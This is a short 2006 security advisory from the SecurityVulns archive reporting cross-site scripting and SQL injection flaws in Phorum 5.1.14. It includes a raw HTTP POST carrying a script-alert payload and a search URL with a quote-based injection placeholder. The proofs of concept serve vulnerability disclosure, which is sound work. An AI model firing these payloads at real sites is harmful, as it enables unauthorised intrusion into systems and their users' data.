Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities

  [KurdishVanilla CMS <= 1.0.1 (RootDirectory)
Remote file inclusion Vuln.]

  [Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo & Joomla]

  DotClear : Multiples Full Path Disclosure

From:securityconnection_(at)_gmail.com <securityconnection_(at)_gmail.com>
Date:24 июля 2006 г.
Subject:Phorum 5.1.14 XSS SQL injection Vulnerability

Phorum 5.1.14
http://www.phorum.org
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/posting.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 447
message_id=0&forum_id=1&mode=<script>alert(/EllipsisSecurityTes
t/)</script>
-------------
SQL injection
-------------
http://target.xx/search.php?1,search=1,page='[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород